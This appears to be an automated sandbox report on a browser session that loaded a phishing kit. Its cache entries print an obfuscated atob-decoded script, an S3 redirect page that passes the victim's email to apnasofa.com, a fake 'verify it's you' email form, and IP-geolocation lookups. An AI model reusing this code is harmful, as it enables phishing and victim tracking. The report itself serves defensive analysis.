                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):16
                              Entropy (8bit):3.75
                              Encrypted:false
                              SSDEEP:3:HxMCR:iY
                              MD5:33EF2868BE6AA314700E14BD49C768F7
                              SHA1:31F61F2918D49D189AD92FB84D8C82B96C075FBE
                              SHA-256:A06CB250708EDB37CB17B7ED1019F55808FE237E5B1700722EDF0F451B9ABF92
                              SHA-512:1EB3341CE08D51A32F86C61709C6BCFA847761603E5F90584171A29CEDBC78308B9CDCEA9F636107749E76192E5208F17E36A6B59AC6EE0551535A9E8E57959A
                              Malicious:false
                              Reputation:low
                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnNhspww4z4xBIFDUMF7i4=?alt=proto
                              Preview:CgkKBw1DBe4uGgA=

                              Chrome Cache Entry: 47

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8794)
                              Category:downloaded
                              Size (bytes):8831
                              Entropy (8bit):5.2261593995743105
                              Encrypted:false
                              SSDEEP:192:VpqgJqqWFV1NAAacnKflfbMXv7RcJncmoMO8ejok:Vp3JoF+eKpMXdincmovjr
                              MD5:4C1820154EC47B89CA1BB86380227ADF
                              SHA1:54EDB576DB3B6FBEB0DD9E06876F842B46E3F0D9
                              SHA-256:C603134B41351BA0664DF64D8CBC553080C23E608E84DA12F9250EC53E4B8352
                              SHA-512:DB5748AC920DA1B0321AC6B3B91549B00C65316EF960678A28FB56CD40E21C8171E49AE8CEA8A490456297169272A697B49C319CF64DE2613CB9AF6910E1DAD2
                              Malicious:false
                              Reputation:low
                              URL:https://apnasofa.com/episode/script.js
                              Preview:var key = "secretkey";.var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US0pWUyIGBkURBgQQH0UFAAoZSzArP0ULExYcYUVZFRANEREdBAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0VZUxhpUkUJYW9ZU0pMUicVGABPR0UGHAYbDwBZFRANEREdBAtzU0UFBwsXHwwWHUUBExYRXVE8HQYMFgBcGBELWkUYeEVUS0VZUxERC0UPYUVZU0VDUkVUS0ULFhEWAAtUCREWEk0QBhddUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZABERSW9US0VZU0UeeEVUFm9zU0VMXUU9BQwNGgQPGx8RSwILEgdDFwgVAglzU0UCBxEbDBcYEQcGFiAZCgwVU1hDFQAALggYGgklAAoZPjc1W0xYeEVUYUVZXEpDPgoXChEQHAtDNgAADgYNGgoNeEVUChYAHQZDFBAaCBEQHAtDFQAAJwoaEhEKHQs9BQMWW0xDCW9US0VZU0UXABxUEG9ZU0VDUkVUS0VZXEpDIhcdBgQLCkUPHQYVHw

                              Chrome Cache Entry: 48

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 1871 x 308, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):21327
                              Entropy (8bit):7.8373557915707295
                              Encrypted:false
                              SSDEEP:384:dOKtgdrfxBB7uIPC/gwqaN+v8K6YgEdjyXiIEbXZwkNYhJP8OgL:AK8jxbuT//NNU4X7EbXBNU8OgL
                              MD5:AC837B485BC1972521C7D36AE2F98F4C
                              SHA1:7901F7AA68B555EFBAA1AD95C9AF1DA21AFD72E0
                              SHA-256:25BB457F05BE6DE51815D6619758F22BD413A5DDE4BFFAEDB075DB06D7B9B8F2
                              SHA-512:0982C31327AEBCD107E382F317715FCF774CD14DAA3235592ED79930B2BD10F331DBB75565558F50C85AB16A75923DBBB4C0971AA5676A517EFADEDB2E0B5B48
                              Malicious:false
                              Reputation:low
                              URL:https://apnasofa.com/episode/image/logo.png
                              Preview:.PNG........IHDR...O...4.....D.{.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..R.IDATx...Kr.I. Z...7.+ .n....9...5o3"W .q...@K...2.yQ...WP......x7..p..(>@..w.8.,.YY)!...w.................................7.y.........c_2.R....._..>..a.~L. ..|...........k.............9^i&..........$........<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........I.......tzz:n?F..o.w.w_.W]..y.......T..6A...........c........>..w......5.L..^K......x......(]..na'..T...|<;;......O.....W9==.[.......j'x......H:.t..m...P;.S....`-...@........O:==....!.y......$......szz..4.......Xy..........].q.l......).@................n

                              Chrome Cache Entry: 49

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:downloaded
                              Size (bytes):21
                              Entropy (8bit):3.463280517810811
                              Encrypted:false
                              SSDEEP:3:YMb1gXMlY:YMeX6Y
                              MD5:188A7DDAF69C860BAF90460AD507337F
                              SHA1:530621CCC828AAB3930603814EF80EF1A79103AC
                              SHA-256:FE0DA54F56BE632726C7892705F471CC075255DA9D2CEA63AF62699C05FB0A29
                              SHA-512:C35AA31D95F3CBA835760FF8434D3B44E4607A43B068480FC9F6599BDADA6B53B362923820ADF073C898D8DDE9515F726F2B7C65662428A5D845116C87D5DC07
                              Malicious:false
                              Reputation:low
                              URL:https://api.ipify.org/?format=json
                              Preview:{"ip":"8.46.123.228"}

                              Chrome Cache Entry: 50

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8794)
                              Category:dropped
                              Size (bytes):8831
                              Entropy (8bit):5.2261593995743105
                              Encrypted:false
                              SSDEEP:192:VpqgJqqWFV1NAAacnKflfbMXv7RcJncmoMO8ejok:Vp3JoF+eKpMXdincmovjr
                              MD5:4C1820154EC47B89CA1BB86380227ADF
                              SHA1:54EDB576DB3B6FBEB0DD9E06876F842B46E3F0D9
                              SHA-256:C603134B41351BA0664DF64D8CBC553080C23E608E84DA12F9250EC53E4B8352
                              SHA-512:DB5748AC920DA1B0321AC6B3B91549B00C65316EF960678A28FB56CD40E21C8171E49AE8CEA8A490456297169272A697B49C319CF64DE2613CB9AF6910E1DAD2
                              Malicious:false
                              Reputation:low
                              Preview:var key = "secretkey";.var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US0pWUyIGBkURBgQQH0UFAAoZSzArP0ULExYcYUVZFRANEREdBAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0VZUxhpUkUJYW9ZU0pMUicVGABPR0UGHAYbDwBZFRANEREdBAtzU0UFBwsXHwwWHUUBExYRXVE8HQYMFgBcGBELWkUYeEVUS0VZUxERC0UPYUVZU0VDUkVUS0ULFhEWAAtUCREWEk0QBhddUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZABERSW9US0VZU0UeeEVUFm9zU0VMXUU9BQwNGgQPGx8RSwILEgdDFwgVAglzU0UCBxEbDBcYEQcGFiAZCgwVU1hDFQAALggYGgklAAoZPjc1W0xYeEVUYUVZXEpDPgoXChEQHAtDNgAADgYNGgoNeEVUChYAHQZDFBAaCBEQHAtDFQAAJwoaEhEKHQs9BQMWW0xDCW9US0VZU0UXABxUEG9ZU0VDUkVUS0VZXEpDIhcdBgQLCkUPHQYVHw

                              Chrome Cache Entry: 51

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:downloaded
                              Size (bytes):58
                              Entropy (8bit):4.245069356823525
                              Encrypted:false
                              SSDEEP:3:YWQRAW6k3RA8LQX+yKLrSNMR4:YWQmyRKjKLrVO
                              MD5:96CB1B42BD2A4803FCD22A65EA5DFC98
                              SHA1:CA4550A99C8B52EDDDCF7D9BFDFEEF85CD78D885
                              SHA-256:41C6BA69A3B925B7C2BCFB14F605DD01582E3AC3589D0247A70A0E7F24338904
                              SHA-512:DFFB9D78E91D994A6D4554EC08C3C15D1E63E68A97525B930EB109CA9A3CC52D8C9CA3B2BC5A65A645E35DA1AADDB568A8687DCA677B1460539F65CA2D35EF99
                              Malicious:false
                              Reputation:low
                              URL:https://ipwhois.app/json/8.46.123.228
                              Preview:{"success":false,"message":"you've hit the monthly limit"}

                              Chrome Cache Entry: 52

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):442
                              Entropy (8bit):4.721509219116008
                              Encrypted:false
                              SSDEEP:6:hxuJzhqIziYcgAjMkBHFiodLcQSpvD9ocMYoQXrA6jMjmmHJ141NLcs4Nhdx434A:hYYxy4LKpvV+6ExHJabLZ4Nbx4IQL
                              MD5:495735A2F76DABA1413C4E6E2F30911B
                              SHA1:55A577F9EBC9CF60E5931A180CA2C4FF0F896444
                              SHA-256:199BD1DDBB59029F61EF8401DA07073AD36DD60EA32B3B2AFDE264DAE949AA58
                              SHA-512:413F3E6F0B8543D9826D638B4686443425EC4B6E5FF3602C9AD0A51472D660BF3935B17A0468DB3F8AAC6B3956B3FEF522E8801C8C4F3051E952A0F742BDEB23
                              Malicious:false
                              Reputation:low
                              URL:https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                              Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <script>. // Get the encoded email parameter from the URL hash. var emailEncoded = window.location.hash.substring(1); // Remove the first character '#'.. // Redirect to the specified URL with the encoded email parameter. window.location.href = "https://apnasofa.com/episode/index#" + emailEncoded;. </script>.</head>.<body>.</body>.</html>.

                              Chrome Cache Entry: 53

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):3703
                              Entropy (8bit):4.810174175624268
                              Encrypted:false
                              SSDEEP:48:czi9BzckSVg7FO9Ets2ve3N8h0BPKqh3GfXsZCSx53ZXHknhi:ukzczuM91IPhEL6sUSx53Z3qc
                              MD5:9A15E091F6B3FBF999B00CBD9E6FC5FC
                              SHA1:5F6E11417BEA2607EE9C34321C0180C981252767
                              SHA-256:70722747860D26455DCD955B57AE5FD9BF15B5A3D6D5CF0D83D413522DB4D11D
                              SHA-512:39B802D8F6A003C6BC7CE87D041664A67D1FA67D83C98B8515C93A51B22E71A16B3278253D7DE2A743BFA51DFF321BFB5B4C6B89A709C78AEF0AA8D0BB5D3D47
                              Malicious:false
                              Reputation:low
                              URL:https://apnasofa.com/episode/style.css
                              Preview:* {. margin: 0;. padding: 0;. box-sizing: border-box;.}..body {. background-color: #FFFAFA;. font-family: 'Segoe UI', Arial, sans-serif;. line-height: 1.6;. color: #333;.}...container {. max-width: 800px;. margin: 40px auto;. padding: 20px;. background: #fff;. border-radius: 8px;. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);.}../* Logo Styles */..logo-container {. text-align: center;. margin-bottom: 20px;. padding: 10px;.}...logo {. max-width: 160px;. height: auto;. margin: 0 auto;.}...verification-section {. text-align: center;. padding: 20px;.}...header {. margin-bottom: 30px;.}...header p {. font-size: 18px;. color: #666;.}../* Email Container Styles */..email-container {. margin: 30px auto;. max-width: 320px;. background: #f8f9fa;. padding: 20px;. border-radius: 6px;. border: 1px solid #e1e1e1;.}...email-box {. display: flex;. align-items: center;. justify-content: center;. gap: 10px

                              Chrome Cache Entry: 54

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):687
                              Entropy (8bit):5.036546324245533
                              Encrypted:false
                              SSDEEP:12:YdjYhZImV+xaNmd6wpHKVDosK9Ogi+Bumjc2sVYheq+5OFAtrHJKWeruN7wvX4uZ:Ydj0RNMhH79qmjc20QmJKpyNSX4i
                              MD5:A315E2D799EC6E5B18A86AB64FF7D179
                              SHA1:79626DC251FBA9CBA353C089011F038843C502BE
                              SHA-256:E9451E48696A0ECE088DEF6AB66EE2BE8BB46F3BC4C07448C77999882626AA93
                              SHA-512:75072715C413DE825F8F01DEB8E5490863B7CD1A612B240BAE36CF8E3DD75888ABE99678F4E022BBAD0E6E6554C09AC2A31BF11F6805BBEC5CF687C7F11AFA7D
                              Malicious:false
                              Reputation:low
                              Preview:{"ip":"8.46.123.228","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","country_flag":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","country_capital":"Washington D.C.","country_phone":"+1","country_neighbours":"CA,MX","region":"New York","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"asn":"AS3356","org":"CenturyLink Communications, LLC","isp":"Level","timezone":"America\/New_York","timezone_name":"EST","timezone_dstOffset":0,"timezone_gmtOffset":-18000,"timezone_gmt":"-05:00","currency":"US Dollar","currency_code":"USD","currency_symbol":"$","currency_rates":1,"currency_plural":"US dollars"}

                              Chrome Cache Entry: 55

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 1871 x 308, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):21327
                              Entropy (8bit):7.8373557915707295
                              Encrypted:false
                              SSDEEP:384:dOKtgdrfxBB7uIPC/gwqaN+v8K6YgEdjyXiIEbXZwkNYhJP8OgL:AK8jxbuT//NNU4X7EbXBNU8OgL
                              MD5:AC837B485BC1972521C7D36AE2F98F4C
                              SHA1:7901F7AA68B555EFBAA1AD95C9AF1DA21AFD72E0
                              SHA-256:25BB457F05BE6DE51815D6619758F22BD413A5DDE4BFFAEDB075DB06D7B9B8F2
                              SHA-512:0982C31327AEBCD107E382F317715FCF774CD14DAA3235592ED79930B2BD10F331DBB75565558F50C85AB16A75923DBBB4C0971AA5676A517EFADEDB2E0B5B48
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR...O...4.....D.{.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..R.IDATx...Kr.I. Z...7.+ .n....9...5o3"W .q...@K...2.yQ...WP......x7..p..(>@..w.8.,.YY)!...w.................................7.y.........c_2.R....._..>..a.~L. ..|...........k.............9^i&..........$........<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........I.......tzz:n?F..o.w.w_.W]..y.......T..6A...........c........>..w......5.L..^K......x......(]..na'..T...|<;;......O.....W9==.[.......j'x......H:.t..m...P;.S....`-...@........O:==....!.y......$......szz..4.......Xy..........].q.l......).@................n

                              Chrome Cache Entry: 56

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):21
                              Entropy (8bit):3.463280517810811
                              Encrypted:false
                              SSDEEP:3:YMb1gXMlY:YMeX6Y
                              MD5:188A7DDAF69C860BAF90460AD507337F
                              SHA1:530621CCC828AAB3930603814EF80EF1A79103AC
                              SHA-256:FE0DA54F56BE632726C7892705F471CC075255DA9D2CEA63AF62699C05FB0A29
                              SHA-512:C35AA31D95F3CBA835760FF8434D3B44E4607A43B068480FC9F6599BDADA6B53B362923820ADF073C898D8DDE9515F726F2B7C65662428A5D845116C87D5DC07
                              Malicious:false
                              Reputation:low
                              Preview:{"ip":"8.46.123.228"}

                              Chrome Cache Entry: 57

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):1471
                              Entropy (8bit):4.503003910018644
                              Encrypted:false
                              SSDEEP:24:hYkCnJyyX5OQm06DRiaRvusNNoZPddWBHZ4T:GlURiYhodWBHGT
                              MD5:81D8BB621BA6DDE48C3AF9A15405F15C
                              SHA1:AC555BEC026EB9BF2E8DB8872F84F918CE8EEDDF
                              SHA-256:C3F0AC0A08C17363CF98B835232E5FC783425538895E2ED0C6FDF686BC627BD1
                              SHA-512:E6E59B1994A1713A4915B9293FAE487CDFD5081E02A02FAAFC0580AD34AEBA1816011CB91968CDE2CA400175C8BFF0169B9854CF138B8450DB39A37B587D8968
                              Malicious:false
                              Reputation:low
                              URL:https://apnasofa.com/episode/index
                              Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>pleased</title>. <link rel="stylesheet" href="style.css">.</head>.<body>. <div class="container">. <div class="section verification-section">. <div class="logo-container">. <img src="image/logo.png" class="logo" alt="Logo">. </div>.. <div class="header">. We need to verify it's you. </div>.. <div class="email-container">. <div class="email-box">. <input type="email" id="emailInput" name="email_input" placeholder="Enter your email address" required>. </div>.. <div id="emailError" class="email-error"></div>.. <button class="submit-btn">Verify</button>. </div>.. <div id="emailLoader" class="loader" style="display: none;">. <div

                              Static File Info

                              No static file info

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 29, 2024 15:58:00.679482937 CET49675443192.168.2.4173.222.162.32
                              Nov 29, 2024 15:58:10.288855076 CET49675443192.168.2.4173.222.162.32
                              Nov 29, 2024 15:58:15.961345911 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:15.961394072 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:15.961483955 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:15.961666107 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:15.961678982 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:16.344779015 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:16.344830990 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:16.344904900 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:16.347059965 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:16.347071886 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:17.041151047 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:17.041193962 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:17.041286945 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:17.041922092 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:17.041965008 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:17.042030096 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:17.042071104 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:17.042085886 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:17.042236090 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:17.042258024 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:17.724718094 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:17.724978924 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:17.725006104 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:17.725917101 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:17.725981951 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:17.730906010 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:17.730984926 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:17.775024891 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:17.775048018 CET44349738172.217.21.36192.168.2.4
                              Nov 29, 2024 15:58:17.799511909 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:17.799582958 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:17.801881075 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:17.801894903 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:17.802109003 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:17.820920944 CET49738443192.168.2.4172.217.21.36
                              Nov 29, 2024 15:58:17.845470905 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.085006952 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.127342939 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.494937897 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.495062113 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.495134115 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.495178938 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.495194912 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.495202065 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.495210886 CET49739443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.495213985 CET443497392.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.540668011 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.540704966 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.540846109 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.541161060 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:18.541172028 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:18.809587002 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.809838057 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.809865952 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.810966015 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.811024904 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.815591097 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.815660000 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.815771103 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.815778971 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.827020884 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.827295065 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.827306032 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.828726053 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.828782082 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.829090118 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.829160929 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.867824078 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.882960081 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:18.882980108 CET44349741142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:18.930197001 CET49741443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:19.696310043 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:19.696465015 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:19.696651936 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:19.696779013 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:19.696798086 CET44349740142.250.181.67192.168.2.4
                              Nov 29, 2024 15:58:19.696830988 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:19.696856022 CET49740443192.168.2.4142.250.181.67
                              Nov 29, 2024 15:58:19.874520063 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:19.874624014 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:19.874737024 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:19.874970913 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:19.875009060 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:20.026772022 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:20.026901960 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:20.028381109 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:20.028389931 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:20.028594017 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:20.029717922 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:20.075325012 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:20.596869946 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:20.596934080 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:20.597001076 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:20.597747087 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:20.597763062 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:20.597796917 CET49742443192.168.2.42.19.202.23
                              Nov 29, 2024 15:58:20.597801924 CET443497422.19.202.23192.168.2.4
                              Nov 29, 2024 15:58:21.566369057 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:21.566641092 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:21.566668987 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:21.567647934 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:21.567709923 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:21.568643093 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:21.568692923 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:21.568860054 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:21.568866014 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:21.619837999 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:22.530011892 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:22.530105114 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:22.530159950 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:22.536075115 CET49743443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:22.536111116 CET44349743172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:22.540724993 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:22.540772915 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:22.540851116 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:22.541146994 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:22.541162968 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:23.254664898 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:23.254734993 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:23.254822969 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:23.255950928 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:23.255985975 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:24.609438896 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:24.609761000 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:24.609786987 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:24.610069990 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:24.610364914 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:24.610416889 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:24.610483885 CET49744443192.168.2.4172.217.19.227
                              Nov 29, 2024 15:58:24.655328035 CET44349744172.217.19.227192.168.2.4
                              Nov 29, 2024 15:58:24.966002941 CET4434974520.12.23.50192.168.2.4
                              Nov 29, 2024 15:58:24.966164112 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:24.968893051 CET49745443192.168.2.420.12.23.50
                              Nov 29, 2024 15:58:24.968943119 CET4434974520.12.23.50192.168.2.4
